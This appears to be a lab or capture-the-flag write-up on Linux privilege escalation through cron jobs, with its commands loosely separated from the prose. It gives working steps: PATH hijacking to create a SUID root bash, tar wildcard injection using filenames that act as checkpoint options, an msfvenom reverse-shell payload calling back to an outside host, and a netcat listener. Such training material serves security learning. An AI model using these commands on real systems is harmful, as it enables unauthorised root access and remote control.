now we run a nc -lnvp 4444 in a terminal and we catch a reverse shell after a little while.
PATH Environment Variable
in the cron tabe bote that the PATH variable starts with /home/user which is our user's home directory.
so we make a file with that name there and it should run it instead of the real overwrite.sh:
Wildcards
the other script in the crontab has this content:
Note that the tar command is being run with a wildcard (*) in your home directory.
Take a look at the GTFOBins page for tar. Note that tar has command line options that let you run other commands as part of a checkpoint feature.
in the GTFOBins page we see sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
we create a payload with msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f elf -o shell.elf and upload it to the target machine. then make it executable with chmod +x /home/user/shell.elf.
now inspired by the GTFOBins command we make these two files:touch /home/user/--checkpoint=1 touch /home/user/--checkpoint-action=exec=shell.elf
When the tar command in the cron job runs, the wildcard (*) will expand to include these files. Since their filenames are valid tar command line options, tar will recognize them as such and treat them as command line options rather than filenames.
then we listen for the reverse shell to arive to out machine.
$ cd && touch overwrite.sh
$ echo '#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash' > overwrite.sh
$ chmod +x /home/user/overwrite.sh
$ # wait a little while for the cron tab to run
$ /tmp/rootbash -p
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *